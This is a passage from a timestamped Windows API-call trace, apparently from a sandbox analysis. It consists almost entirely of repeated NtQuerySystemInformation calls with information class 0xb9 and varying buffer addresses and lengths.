SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x28, ResultLength=0x0) [0269.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0269.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc460, Length=0x20, ResultLength=0x0) [0269.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc460, Length=0x20, ResultLength=0x0) [0269.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc460, Length=0x20, ResultLength=0x0) [0269.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0269.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0269.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0269.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x58, ResultLength=0x0) [0269.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x28, ResultLength=0x0) [0269.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x28, ResultLength=0x0) [0269.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0269.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0269.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0269.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x38, ResultLength=0x0) [0269.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0269.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0269.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0269.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x58, ResultLength=0x0) [0269.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0269.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0269.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0269.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0269.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0269.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x28, ResultLength=0x0) [0269.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0269.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0269.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0269.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0269.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0269.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0269.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc480, Length=0x20, ResultLength=0x0) [0269.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc400, Length=0x20, ResultLength=0x0) [0269.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc400, Length=0x20, ResultLength=0x0) [0269.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc400, Length=0x20, ResultLength=0x0) [0269.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0269.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0269.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0269.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0269.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0269.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0269.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0269.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0269.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0269.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0269.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0269.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0269.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0269.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc500, Length=0x20, ResultLength=0x0) [0269.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc500, Length=0x20, ResultLength=0x0) [0269.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca68, Length=0x50, ResultLength=0x0) [0269.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc990, Length=0x38, ResultLength=0x0) [0269.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0269.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0269.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0269.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0269.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0269.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc990, Length=0x38, ResultLength=0x0) [0269.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x28, ResultLength=0x0) [0269.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x28, ResultLength=0x0) [0269.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc990, Length=0x38, ResultLength=0x0) [0269.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x20, ResultLength=0x0) [0269.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0269.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0269.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0269.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc990, Length=0x38, ResultLength=0x0) [0269.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x20, ResultLength=0x0) [0269.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x20, ResultLength=0x0) [0269.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x20, ResultLength=0x0) [0269.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.799] NtQuerySystemInformation 